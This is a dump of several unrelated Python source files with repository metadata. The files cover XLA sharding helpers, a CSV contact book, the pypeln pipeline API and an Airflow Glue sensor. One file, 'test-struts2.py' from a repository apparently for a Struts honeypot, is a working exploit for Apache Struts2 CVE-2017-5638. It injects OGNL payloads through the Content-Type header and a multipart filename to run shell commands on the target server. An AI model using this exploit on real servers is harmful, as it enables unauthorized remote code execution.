See
https://github.com/tensorflow/tensorflow/blob/main/tensorflow/compiler/xla/xla_data.proto#L601
for details on the OpSharding proto.
"""
proto = xla_client.OpSharding()
if isinstance(sharding, tuple) and not isinstance(sharding[0], int):
assert all(s is None or isinstance(s, tuple) for s in sharding)
return tuple_sharding_proto(list(map(_sharding_to_proto, sharding))) # type: ignore
if sharding is None:
proto.type = xla_client.OpSharding.Type.REPLICATED
else:
proto.type = xla_client.OpSharding.Type.OTHER
proto.tile_assignment_dimensions = list(sharding)
proto.tile_assignment_devices = list(range(np.product(sharding)))
return proto
def tuple_sharding_proto(elems):
proto = xla_client.OpSharding()
assert all(isinstance(e, type(proto)) for e in elems)
proto.type = xla_client.OpSharding.Type.TUPLE
proto.tuple_shardings = elems
return proto
def set_sharding_proto(builder, op, sharding_proto):
"""Uses CustomCall to annotate a value as sharded."""
# "Sharding" is a built-in custom call target that acts like an identity
# function, and is used to attach an OpSharding to.
return with_sharding_proto(builder, sharding_proto, xops.CustomCall,
builder, b"Sharding", [op], builder.get_shape(op))
def with_sharding_proto(builder, sharding_proto, op_fn, *args, **kwargs):
"""Builds op_fn(*args, **kwargs) with sharding annotation."""
builder.set_sharding(sharding_proto)
try:
return op_fn(*args, **kwargs)
finally:
builder.clear_sharding()
def set_sharding(builder, op, sharding: SpatialSharding):
"""Uses CustomCall to annotate a value as sharded."""
return set_sharding_proto(builder, op, _sharding_to_proto(sharding))
def with_sharding(builder, sharding: SpatialSharding, op_fn, *args, **kwargs):
"""Builds op_fn(*args, **kwargs) with sharding annotation."""
return with_sharding_proto(builder, _sharding_to_proto(sharding), op_fn, *args, **kwargs)
| 37.083495 | 96 | 0.716986 |
f9be8c78e39fdf74c899bd9190d5de7898efe2ff | 379 | py | Python | TestDemo/test1.py | XiMuYouZi/PythonDemo | 476d4d814338f37148bbf1504c0dd94a68f55a05 | [
"MIT"
] | null | null | null | TestDemo/test1.py | XiMuYouZi/PythonDemo | 476d4d814338f37148bbf1504c0dd94a68f55a05 | [
"MIT"
] | 1 | 2020-12-11T06:21:32.000Z | 2020-12-11T06:21:32.000Z | TestDemo/test1.py | XiMuYouZi/PythonDemo | 476d4d814338f37148bbf1504c0dd94a68f55a05 | [
"MIT"
] | null | null | null | import re
_matches = lambda url, regexs: any(r.search(url) for r in regexs)
url = 'https://book.douban.com/tag/BL?start=500&type=R>'
patten = re.compile(r'start=\d+\&type=')
allow_res = []
allow_res.append(patten)
def match(url, allow_res):
if allow_res and not _matches(url, allow_res):
return False
else:
return True
print(match(url, allow_res))
| 19.947368 | 65 | 0.672823 |
c7207703f3fd93b06322e53c83ac35058ddc8ac4 | 4,467 | py | Python | contacts.py | MrInternauta/Python-CRUD-a-CSV | ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4 | [
"MIT"
] | null | null | null | contacts.py | MrInternauta/Python-CRUD-a-CSV | ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4 | [
"MIT"
] | null | null | null | contacts.py | MrInternauta/Python-CRUD-a-CSV | ebc9f92c5ed1537ce3330cafdc6c51ca4dfd14c4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import csv
class Contact:
def __init__(self, name, phone, email):
self.name = name
self.phone = phone
self.email = email
class ContactBook:
def __init__(self):
self._contacts = []
def add(self, name, phone, email):
contact = Contact(name, phone, email)
self._contacts.append(contact)
self._save()
print('Contacto añadido')
def show_all(self):
for contact in self._contacts:
self._print_contact(contact)
def _print_contact(self,contact):
print('--- * --- * --- * --- * --- * --- * --- * ---')
print('Nombre: {}'.format(contact.name))
print('Teléfono: {}'.format(contact.phone))
print('Email: {}'.format(contact.email))
print('--- * --- * --- * --- * --- * --- * --- * ---')
def delete(self, name):
for idx, contact in enumerate(self._contacts):
if contact.name.lower() == name.lower():
del self._contacts[idx]
self._save()
print('Contacto eliminado')
break
def search(self, name):
for contact in self._contacts:
if contact.name.upper() == name.upper():
self._print_contact(contact)
break
def not_found(self):
print('*******')
print('¡No encontrado!')
print('*******')
def _save(self):
with open('contacts.csv', 'w') as f:
writer = csv.writer(f)
writer.writerow(('name', 'phone','email'))
for contact in self._contacts:
writer.writerow((contact.name, contact.phone, contact.email))
def update(self, name, que, data):
for idx, contact in enumerate(self._contacts):
if contact.name.upper() == name.upper():
if que == 'n':
self._contacts[idx].name = data
self._print_contact(contact)
self._save()
break
elif que == 't':
self._contacts[idx].phone = data
self._print_contact(contact)
self._save()
break
elif que == 'e':
self._contacts[idx].email = data
self._print_contact(contact)
self._save()
break
else:
print('El campo que quieres actualizar no existe')
break
def run():
contact_book = ContactBook()
with open('contacts.csv', 'r') as f:
reader = csv.reader(f)
for idx, row in enumerate(reader):
if idx == 0:
continue
else:
contact_book.add(row[0], row[1], row[2])
while True:
comando = str(raw_input('''
...:::CONTACTOS:::...
-Teclea una opción-
[a]ñadir contacto
[ac]tualizar contacto
[b]uscar contacto
[e]liminar contacto
[l]istar contactos
[s]alir
'''))
print(comando)
if comando == 'a':
print('...:::Añadir contacto:::...')
name = str(raw_input('Ingresar nombre de contacto: '))
phone = str(raw_input('Ingresar telefono de contacto: '))
email = str(raw_input('Ingresar Email de contacto: '))
contact_book.add(name, phone, email)
elif comando == 'ac':
print('Actualizar contacto')
name = str(raw_input('Ingresar nombre de contacto: '))
que = str(raw_input('''
¿Que desea actualizar?
[n]ombre
[t]elefono
[e]mail
'''))
data = str(raw_input('Ingresar el nuevo dato del contacto: '))
contact_book.update( name, que, data)
elif comando == 'b':
print('Buscar contacto')
name = str(raw_input('Ingresar nombre de contacto: '))
contact_book.search(name)
elif comando == 'e':
print('Eliminar contacto')
name = str(raw_input('Ingresar nombre de contacto: '))
contact_book.delete(name)
elif comando == 'l':
print('Listar contactos')
contact_book.show_all()
elif comando == 's':
break
else:
print('Error de comando')
if __name__ == '__main__':
run()
| 29.979866 | 77 | 0.49071 |
0ebd057e450e1f0162848fa8f312826c2100fc45 | 3,959 | py | Python | test-struts2.py | Cymmetria/StrutsHoneypot | 8be5370aa070d5fc39c48b2060d2513c5617525f | [
"MIT"
] | 74 | 2017-03-20T21:55:11.000Z | 2022-03-03T15:56:37.000Z | test-struts2.py | Cymmetria/StrutsHoneypot | 8be5370aa070d5fc39c48b2060d2513c5617525f | [
"MIT"
] | 1 | 2017-09-08T11:44:05.000Z | 2017-09-10T10:27:15.000Z | test-struts2.py | Cymmetria/StrutsHoneypot | 8be5370aa070d5fc39c48b2060d2513c5617525f | [
"MIT"
] | 21 | 2017-03-21T10:50:10.000Z | 2022-01-24T13:33:48.000Z | #!/usr/bin/python
import urllib2
import requests
import httplib
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
#uso: python script.py <url> "<command>"
def exploit_ct(url):
payload = "%{(#_='multipart/form-data')."
payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
payload += "(#_memberAccess?"
payload += "(#_memberAccess=#dm):"
payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
payload += "(#ognlUtil.getExcludedPackageNames().clear())."
payload += "(#ognlUtil.getExcludedClasses().clear())."
payload += "(#context.setMemberAccess(#dm))))."
payload += "(#cmd='dir')."
payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
payload += "(#ros.flush())}"
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
#request = urllib2.Request(url, headers=headers)
request = requests.get(url, headers=headers,verify=False)
#page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
request = e.partial
print(request.text)
return request
def exploit_cd(url):
cd_boundary = "---------------------------735323031399963166993862150"
content_type = "multipart/form-data; boundary=%s" % (cd_boundary,)
filename_payload = "%{(#nike='multipart/form-data')"
filename_payload += ".(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)"
filename_payload += ".(#_memberAccess?(#_memberAccess=#dm):("
filename_payload += "(#container=#context['com.opensymphony.xwork2.ActionContext.container'])"
filename_payload += ".(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))"
filename_payload += ".(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())."
filename_payload += "(#context.setMemberAccess(#dm)))).(#cmd='dir').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
filename_payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
filename_payload += "(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true))."
filename_payload += "(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))"
filename_payload += ".(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
cd_name = "foo"
cd_payload = "--%s\r\nContent-Disposition: form-data; name=\"%s\"; "
cd_payload += "filename=\"%s\0b\"\r\nContent-Type: text/plain\r\n\r\nx\r\n--%s--\r\n\r\n"
cd_payload = cd_payload % (cd_boundary, cd_name, filename_payload, cd_boundary)
try:
headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': content_type}
#request = urllib2.Request(url, headers=headers)
request = requests.post(url, cd_payload, headers=headers,verify=False)
#page = urllib2.urlopen(request).read()
except httplib.IncompleteRead, e:
request = e.partial
print(request.text)
return request
def main():
import sys
if len(sys.argv) != 2:
print("Usage: %s <url>" % sys.argv[0])
return
print("");
print("\te.g: %s http://localhost/" % sys.argv[0])
print("");
print("[*] CVE: 2017-5638 - Apache Struts2 S2-045")
url = sys.argv[1]
print("[*] cmd: %s\n" % 'dir')
print("[*] Attempt #1: Content-Length exploit")
exploit_ct(url)
print("[*] Attempt #2: Content-Disposition exploit")
exploit_cd(url)
if __name__ == '__main__':
main()
| 37 | 152 | 0.687547 |
954b7a2b4ac5339d8353223b10e205ca8472d905 | 19,043 | py | Python | pypeln/process/api.py | sackh/pypeln | 4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075 | [
"MIT"
] | 1 | 2020-07-22T18:19:21.000Z | 2020-07-22T18:19:21.000Z | pypeln/process/api.py | sackh/pypeln | 4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075 | [
"MIT"
] | null | null | null | pypeln/process/api.py | sackh/pypeln | 4bbfb23d8fb7581e9c7511fdf4316e34b7a2a075 | [
"MIT"
] | null | null | null | """
The `process` module lets you create pipelines using objects from python's [multiprocessing](https://docs.python.org/3/library/multiprocessing.html) module according to Pypeln's general [architecture](https://cgarciae.github.io/pypeln/advanced/#architecture). Use this module when you are in need of true parallelism for CPU heavy operations but be aware of its implications.
"""
import typing
from threading import Thread
from pypeln import utils as pypeln_utils
from . import utils
from .stage import Stage
#############################################################
# from_iterable
#############################################################
class FromIterable(Stage):
def __init__(self, iterable, *args, **kwargs):
super().__init__(*args, **kwargs)
self.iterable = iterable
def process(self, worker_namespace):
for x in self.iterable:
if self.pipeline_namespace.error:
return
self.output_queues.put(x)
def from_iterable(
iterable: typing.Iterable = pypeln_utils.UNDEFINED,
maxsize: int = None,
worker_constructor: typing.Type = Thread,
) -> Stage:
"""
Creates a stage from an iterable. This function gives you more control of how a stage is created through the `worker_constructor` parameter which can be either:
* `threading.Thread`: (default) is efficient for iterables that already have the data in memory like lists or numpy arrays because threads can share memory so no serialization is needed.
* `multiprocessing.Process`: is efficient for iterables who's data is not in memory like arbitrary generators and benefit from escaping the GIL. This is inefficient for iterables which have data in memory because they have to be serialized when sent to the background process.
Arguments:
iterable: a source iterable.
maxsize: this parameter is not used and only kept for API compatibility with the other modules.
worker_constructor: defines the worker type for the producer stage.
Returns:
If the `iterable` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(iterable):
return pypeln_utils.Partial(
lambda iterable: from_iterable(
iterable, maxsize=None, worker_constructor=worker_constructor
)
)
return FromIterable(
iterable=iterable,
f=None,
worker_constructor=worker_constructor,
workers=1,
maxsize=0,
timeout=0,
on_start=None,
on_done=None,
dependencies=[],
)
#############################################################
# to_stage
#############################################################
def to_stage(obj):
if isinstance(obj, Stage):
return obj
elif hasattr(obj, "__iter__"):
return from_iterable(obj)
else:
raise ValueError(f"Object {obj} is not a Stage or iterable")
#############################################################
# map
#############################################################
class Map(Stage):
def apply(self, x, **kwargs):
y = self.f(x, **kwargs)
self.output_queues.put(y)
def map(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
) -> Stage:
"""
Creates a stage that maps a function `f` over the data. Its intended to behave like python's built-in `map` function but with the added concurrency.
```python
import pypeln as pl
import time
from random import random
def slow_add1(x):
time.sleep(random()) # <= some slow computation
return x + 1
data = range(10) # [0, 1, 2, ..., 9]
stage = pl.process.map(slow_add1, data, workers=3, maxsize=4)
data = list(stage) # e.g. [2, 1, 5, 6, 3, 4, 7, 8, 9, 10]
```
!!! note
Because of concurrency order is not guaranteed.
Arguments:
f: A function with signature `f(x, **kwargs) -> y`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
Returns:
If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: map(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
return Map(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
#############################################################
# flat_map
#############################################################
class FlatMap(Stage):
def apply(self, x, **kwargs):
for y in self.f(x, **kwargs):
self.output_queues.put(y)
def flat_map(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
) -> Stage:
"""
Creates a stage that maps a function `f` over the data, however unlike `pypeln.process.map` in this case `f` returns an iterable. As its name implies, `flat_map` will flatten out these iterables so the resulting stage just contains their elements.
```python
import pypeln as pl
import time
from random import random
def slow_integer_pair(x):
time.sleep(random()) # <= some slow computation
if x == 0:
yield x
else:
yield x
yield -x
data = range(10) # [0, 1, 2, ..., 9]
stage = pl.process.flat_map(slow_integer_pair, data, workers=3, maxsize=4)
list(stage) # e.g. [2, -2, 3, -3, 0, 1, -1, 6, -6, 4, -4, ...]
```
!!! note
Because of concurrency order is not guaranteed.
`flat_map` is a more general operation, you can actually implement `pypeln.process.map` and `pypeln.process.filter` with it, for example:
```python
import pypeln as pl
pl.process.map(f, stage) = pl.process.flat_map(lambda x: [f(x)], stage)
pl.process.filter(f, stage) = pl.process.flat_map(lambda x: [x] if f(x) else [], stage)
```
Using `flat_map` with a generator function is very useful as e.g. you are able to filter out unwanted elements when there are exceptions, missing data, etc.
Arguments:
f: A function with signature `f(x, **kwargs) -> Iterable`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
Returns:
If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: flat_map(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
return FlatMap(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
#############################################################
# filter
#############################################################
class Filter(Stage):
def apply(self, x, **kwargs):
if self.f(x, **kwargs):
self.output_queues.put(x)
def filter(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
) -> Stage:
"""
Creates a stage that filter the data given a predicate function `f`. It is intended to behave like python's built-in `filter` function but with the added concurrency.
```python
import pypeln as pl
import time
from random import random
def slow_gt3(x):
time.sleep(random()) # <= some slow computation
return x > 3
data = range(10) # [0, 1, 2, ..., 9]
stage = pl.process.filter(slow_gt3, data, workers=3, maxsize=4)
data = list(stage) # e.g. [5, 6, 3, 4, 7, 8, 9]
```
!!! note
Because of concurrency order is not guaranteed.
Arguments:
f: A function with signature `f(x, **kwargs) -> bool`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
Returns:
If the `stage` parameters is given then this function returns a new stage, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: filter(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
return Filter(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
#############################################################
# each
#############################################################
class Each(Stage):
def apply(self, x, **kwargs):
self.f(x, **kwargs)
def each(
f: typing.Callable,
stage: Stage = pypeln_utils.UNDEFINED,
workers: int = 1,
maxsize: int = 0,
timeout: float = 0,
on_start: typing.Callable = None,
on_done: typing.Callable = None,
run: bool = False,
) -> Stage:
"""
Creates a stage that runs the function `f` for each element in the data but the stage itself yields no elements. Its useful for sink stages that perform certain actions such as writting to disk, saving to a database, etc, and dont produce any results. For example:
```python
import pypeln as pl
def process_image(image_path):
image = load_image(image_path)
image = transform_image(image)
save_image(image_path, image)
files_paths = get_file_paths()
stage = pl.process.each(process_image, file_paths, workers=4)
pl.process.run(stage)
```
or alternatively
```python
files_paths = get_file_paths()
pl.process.each(process_image, file_paths, workers=4, run=True)
```
!!! note
Because of concurrency order is not guaranteed.
Arguments:
f: A function with signature `f(x, **kwargs) -> None`, where `kwargs` is the return of `on_start` if present.
stage: A stage or iterable.
workers: The number of workers the stage should contain.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
timeout: Seconds before stoping the worker if its current task is not yet completed. Defaults to `0` which means its unbounded.
on_start: A function with signature `on_start(worker_info?) -> kwargs`, where `kwargs` can be a `dict` of keyword arguments that will be passed to `f` and `on_done`. If you define a `worker_info` argument an object with information about the worker will be passed. This function is executed once per worker at the beggining.
on_done: A function with signature `on_done(stage_status?, **kwargs)`, where `kwargs` is the return of `on_start` if present. If you define a `stage_status` argument an object with information about the stage will be passed. This function is executed once per worker when the worker finishes.
run: Whether or not to execute the stage immediately.
Returns:
If the `stage` parameters is not given then this function returns a `Partial`, else if `run=False` (default) it return a new stage, if `run=True` then it runs the stage and returns `None`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(
lambda stage: each(
f,
stage=stage,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
)
)
stage = to_stage(stage)
stage = Each(
f=f,
workers=workers,
maxsize=maxsize,
timeout=timeout,
on_start=on_start,
on_done=on_done,
dependencies=[stage],
)
if not run:
return stage
for _ in stage:
pass
#############################################################
# concat
#############################################################
class Concat(Stage):
def apply(self, x):
self.output_queues.put(x)
def concat(stages: typing.List[Stage], maxsize: int = 0) -> Stage:
"""
Concatenates / merges many stages into a single one by appending elements from each stage as they come, order is not preserved.
```python
import pypeln as pl
stage_1 = [1, 2, 3]
stage_2 = [4, 5, 6, 7]
stage_3 = pl.process.concat([stage_1, stage_2]) # e.g. [1, 4, 5, 2, 6, 3, 7]
```
Arguments:
stages: a list of stages or iterables.
maxsize: the maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
Returns:
A stage object.
"""
stages = [to_stage(stage) for stage in stages]
return Concat(
f=None,
workers=1,
maxsize=maxsize,
timeout=0,
on_start=None,
on_done=None,
dependencies=stages,
)
#############################################################
# run
#############################################################
def run(stages: typing.List[Stage], maxsize: int = 0) -> None:
"""
Iterates over one or more stages until their iterators run out of elements.
```python
import pypeln as pl
data = get_data()
stage = pl.process.each(slow_fn, data, workers=6)
# execute pipeline
pl.process.run(stage)
```
Arguments:
stages: A stage/iterable or list of stages/iterables to be iterated over. If a list is passed, stages are first merged using `concat` before iterating.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
"""
if isinstance(stages, list) and len(stages) == 0:
raise ValueError("Expected at least 1 stage to run")
elif isinstance(stages, list):
stage = concat(stages, maxsize=maxsize)
else:
stage = stages
stage = to_iterable(stage, maxsize=maxsize)
for _ in stages:
pass
#############################################################
# to_iterable
#############################################################
def to_iterable(
stage: Stage = pypeln_utils.UNDEFINED, maxsize: int = 0
) -> typing.Iterable:
"""
Creates an iterable from a stage.
Arguments:
stage: A stage object.
maxsize: The maximum number of objects the stage can hold simultaneously, if set to `0` (default) then the stage can grow unbounded.
Returns:
If the `stage` parameters is given then this function returns an iterable, else it returns a `Partial`.
"""
if pypeln_utils.is_undefined(stage):
return pypeln_utils.Partial(lambda stage: to_iterable(stage, maxsize=maxsize))
if isinstance(stage, Stage):
iterable = stage.to_iterable(maxsize=maxsize)
else:
iterable = stage
return iterable
| 34.560799 | 375 | 0.60899 |
b8f7f02ca721b2c2f8034f2d68772722f1c0f5ac | 592 | py | Python | earthshotsoil/env_data.py | qAp/earthshotsoil | 29386e80f4e0188cd69334d7ddb526d923732f14 | [
"Apache-2.0"
] | null | null | null | earthshotsoil/env_data.py | qAp/earthshotsoil | 29386e80f4e0188cd69334d7ddb526d923732f14 | [
"Apache-2.0"
] | null | null | null | earthshotsoil/env_data.py | qAp/earthshotsoil | 29386e80f4e0188cd69334d7ddb526d923732f14 | [
"Apache-2.0"
] | null | null | null | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/01_environ_covariates.ipynb (unless otherwise specified).
__all__ = ['URLs', 'n', 'n']
# Cell
import os
from urlpath import URL
import easydict
import requests
import math
import numpy as np
import xarray as xr
import rioxarray
# Cell
URLs = easydict.EasyDict()
# Cell
n = 'EarthEnvCloudCover_MODCF_interannualSD'
URLs[n] = URL('https://data.earthenv.org/cloud/'
'MODCF_interannualSD.tif')
# Cell
n = 'EarthEnvCloudCover_MODCF_intraannualSD'
URLs[n] = URL('https://data.earthenv.org/cloud/'
'MODCF_intraannualSD.tif') | 22.769231 | 105 | 0.733108 |
b39dba5b4eab1c27a07e95bdff765b5c9c70885f | 4,381 | py | Python | airflow/providers/amazon/aws/sensors/glue_catalog_partition.py | augusto-herrmann/airflow | 7ee4295dd3f7dba4fcd763286c7823bb1707fe99 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 4 | 2021-06-26T13:37:35.000Z | 2022-01-11T15:49:44.000Z | airflow/providers/amazon/aws/sensors/glue_catalog_partition.py | augusto-herrmann/airflow | 7ee4295dd3f7dba4fcd763286c7823bb1707fe99 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | 33 | 2021-07-25T10:29:30.000Z | 2022-03-30T04:39:06.000Z | airflow/providers/amazon/aws/sensors/glue_catalog_partition.py | augusto-herrmann/airflow | 7ee4295dd3f7dba4fcd763286c7823bb1707fe99 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"ECL-2.0",
"BSD-3-Clause"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import warnings
from typing import TYPE_CHECKING, Optional, Sequence
from airflow.providers.amazon.aws.hooks.glue_catalog import GlueCatalogHook
from airflow.sensors.base import BaseSensorOperator
if TYPE_CHECKING:
from airflow.utils.context import Context
class GlueCatalogPartitionSensor(BaseSensorOperator):
"""
Waits for a partition to show up in AWS Glue Catalog.
:param table_name: The name of the table to wait for, supports the dot
notation (my_database.my_table)
:type table_name: str
:param expression: The partition clause to wait for. This is passed as
is to the AWS Glue Catalog API's get_partitions function,
and supports SQL like notation as in ``ds='2015-01-01'
AND type='value'`` and comparison operators as in ``"ds>=2015-01-01"``.
See https://docs.aws.amazon.com/glue/latest/dg/aws-glue-api-catalog-partitions.html
#aws-glue-api-catalog-partitions-GetPartitions
:type expression: str
:param aws_conn_id: ID of the Airflow connection where
credentials and extra configuration are stored
:type aws_conn_id: str
:param region_name: Optional aws region name (example: us-east-1). Uses region from connection
if not specified.
:type region_name: str
:param database_name: The name of the catalog database where the partitions reside.
:type database_name: str
:param poke_interval: Time in seconds that the job should wait in
between each tries
:type poke_interval: int
"""
template_fields: Sequence[str] = (
'database_name',
'table_name',
'expression',
)
ui_color = '#C5CAE9'
def __init__(
self,
*,
table_name: str,
expression: str = "ds='{{ ds }}'",
aws_conn_id: str = 'aws_default',
region_name: Optional[str] = None,
database_name: str = 'default',
poke_interval: int = 60 * 3,
**kwargs,
):
super().__init__(poke_interval=poke_interval, **kwargs)
self.aws_conn_id = aws_conn_id
self.region_name = region_name
self.table_name = table_name
self.expression = expression
self.database_name = database_name
self.hook: Optional[GlueCatalogHook] = None
def poke(self, context: 'Context'):
"""Checks for existence of the partition in the AWS Glue Catalog table"""
if '.' in self.table_name:
self.database_name, self.table_name = self.table_name.split('.')
self.log.info(
'Poking for table %s. %s, expression %s', self.database_name, self.table_name, self.expression
)
return self.get_hook().check_for_partition(self.database_name, self.table_name, self.expression)
def get_hook(self) -> GlueCatalogHook:
"""Gets the GlueCatalogHook"""
if self.hook:
return self.hook
self.hook = GlueCatalogHook(aws_conn_id=self.aws_conn_id, region_name=self.region_name)
return self.hook
class AwsGlueCatalogPartitionSensor(GlueCatalogPartitionSensor):
"""
This sensor is deprecated. Please use
:class:`airflow.providers.amazon.aws.sensors.glue_catalog_partition.GlueCatalogPartitionSensor`.
"""
def __init__(self, *args, **kwargs):
warnings.warn(
"This sensor is deprecated. "
"Please use :class:`airflow.providers.amazon.aws.sensors.glue_catalog_partition.GlueCatalogPartitionSensor`.", # noqa: 501
DeprecationWarning,
stacklevel=2,
)
super().__init__(*args, **kwargs)
| 38.429825 | 135 | 0.688884 |
8cab8cad858eaa54991104c33aa0adee1d6a9ee0 | 265 | py | Python | ex10.py | Ma-Min-Min/python-exercises | 1b0d63456d88b4750f89821782812becf4177375 | [
"MIT"
] | null | null | null | ex10.py | Ma-Min-Min/python-exercises | 1b0d63456d88b4750f89821782812becf4177375 | [
"MIT"
] | null | null | null | ex10.py | Ma-Min-Min/python-exercises | 1b0d63456d88b4750f89821782812becf4177375 | [
"MIT"
] | null | null | null | tabby_cat = "\tI'm tabbed in."
persian_cat = "\I'm split \non a line."
backslash_cat = "I'm \\ a \\ cat."
fat_cat = """
I'll do a list:
\t* Cat food
\t* Fishies
\t* Catnip\n\t* Grass
"""
print (tabby_cat)
print (persian_cat)
print (backslash_cat)
print (fat_cat)
| 16.5625 | 39 | 0.649057 |
e2e250ae8f857a236eb45b9a13ccca433ea81fc8 | 11,011 | py | Python | thonny/plugins/autocomplete.py | aroberge/thonny | 919769139c9cbfdfa2b78f6a6f0a3d9ecee56e28 | [
"MIT"
